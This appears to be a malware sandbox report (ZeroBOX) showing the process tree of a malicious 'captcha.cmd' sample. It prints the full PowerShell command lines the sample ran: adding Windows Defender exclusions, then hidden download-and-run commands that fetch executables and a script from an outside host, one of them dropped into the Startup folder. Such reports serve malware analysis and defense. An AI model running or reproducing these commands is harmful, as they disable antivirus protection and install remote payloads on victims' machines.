| ZeroBOX

cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "IWzFgieEMMVP" C:\Users\test22\AppData\Local\Temp\captcha.cmd
1440
- cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\captcha.cmd
  1028
  - powershell.exe powershell -ep remotesigned -Command "IEX $([System.IO.File]::ReadAllText('C:\Users\test22\AppData\Local\Temp\captcha.cmd'))"
    2144
    - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command Add-MpPreference -ExclusionExtension '.exe','.bat','.vbs','.lnk'; Add-MpPreference -ExclusionPath 'C:\Users\test22'; Add-MpPreference -ExclusionPath 'C:/Windows'
      2272
    - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command Invoke-WebRequest -Uri 'https://1drv.media/qz.exe' -OutFile 'C:\Users\test22\qdll.exe'; Start-Process -FilePath 'C:\Users\test22\qdll.exe'
      2396
    - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command Invoke-WebRequest -Uri 'https://1drv.media/xc.exe' -OutFile 'C:\Users\test22\XClient.exe'; Start-Process -FilePath 'C:\Users\test22\XClient.exe'
      2444
    - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command Invoke-WebRequest -Uri 'https://1drv.media/GwKVGTzF/TGC.exe' -OutFile 'C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TGC.exe'; Start-Process -FilePath 'C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TGC.exe'
      2504
    - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command Invoke-WebRequest -Uri 'https://1drv.media/TGR.exe' -OutFile 'C:\Users\test22\TGR.exe'; Start-Process -FilePath 'C:\Users\test22\TGR.exe'
      2564
    - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command Invoke-WebRequest -Uri 'https://1drv.media/TGS.exe' -OutFile 'C:\Users\test22\TGS.exe'; Start-Process -FilePath 'C:\Users\test22\TGS.exe'
      2640
    - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command Invoke-WebRequest -Uri 'https://1drv.media/clp.ps1' -OutFile 'C:\Users\test22\clp.ps1'; Start-Process -FilePath 'powershell.exe' -ArgumentList '-NoProfile', '-ExecutionPolicy', 'Bypass', '-WindowStyle', 'Hidden', '-File', 'C:\Users\test22\clp.ps1' -WindowStyle Hidden
      2736
      - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File C:\Users\test22\clp.ps1
        2872
    - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command Invoke-WebRequest -Uri 'https://1drv.media/cs.exe' -OutFile 'C:\Users\test22\TGS.exe'; Start-Process -FilePath 'C:\Users\test22\TGS.exe'
      2888

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID

default registry file network process services synchronisation iexplore office pdf

Behavioral Analysis

Process tree

Process contents